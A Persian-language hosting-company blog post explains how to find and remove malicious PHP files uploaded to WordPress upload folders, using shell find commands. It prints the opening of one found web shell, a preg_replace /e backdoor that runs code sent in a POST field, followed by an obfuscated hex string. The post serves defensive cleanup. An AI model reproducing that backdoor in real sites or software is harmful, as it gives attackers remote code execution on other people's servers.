‏‪‫حذف Malware های آپلود شده از طریق shell در وردپرس

۰ 109 کمتر از یک دقیقه

اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها ۷۷۷ می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید :

find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

1	find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' \| sort

به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد:

2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php

2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php

2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php

2015-10-16 12:25:01 ./wp-content/uploads/about_us.php

2015-10-16 12:25:01 ./wp-content/uploads/contactus.php

2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php

2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php

2015-10-16 12:25:01 ./wp-content/uploads/team.php

2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php

2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php

2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php

2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php

2015-10-16 12:25:01 ./wp-content/uploads/about_us.php

2015-10-16 12:25:01 ./wp-content/uploads/contactus.php

2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php

2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php

2015-10-16 12:25:01 ./wp-content/uploads/team.php

2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php

می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید.

به عنوان مثال در فایل blog84.php بدین صورت می باشد:

head ./wp-content/uploads/2013/05/blog84.php


<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');

$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5

head ./wp-content/uploads/2013/05/blog84.php

<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');

$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5

همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند.

می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) را حذف نمایید.

همچنین شما میتوانید از طریق دستور زیر، تمام سرور خود را برای پیدا کردن فایل های مخرب بررسی کنید

find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

1	find /home//domains//public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' \| sort

رعایت این موارد می تواند کمک زیادی برای جلوگیری از بلک لیست شدن آی پی میل سرور نماید.

برچسب ها

‏‪‫حذف Malware های آپلود شده از طریق shell در وردپرس

دیدگاهتان را بنویسید لغو پاسخ

هاست

ثبت دامنه

سرور اختصاصی

دیگر خدمات

رسالت ایران سرور

بیشتر بخوانید

نوشته های مشابه

‫سرقت رمز نرم‌افزارهای مدیریت رمز

‫تهدید جدید امنیتی CryptoPHP و راه مقابله با آن

توابع PHP Callback راه جدید مخفی کردن Backdoorها

دیدگاهتان را بنویسید لغو پاسخ

هاست

ثبت دامنه

سرور اختصاصی

دیگر خدمات

ورود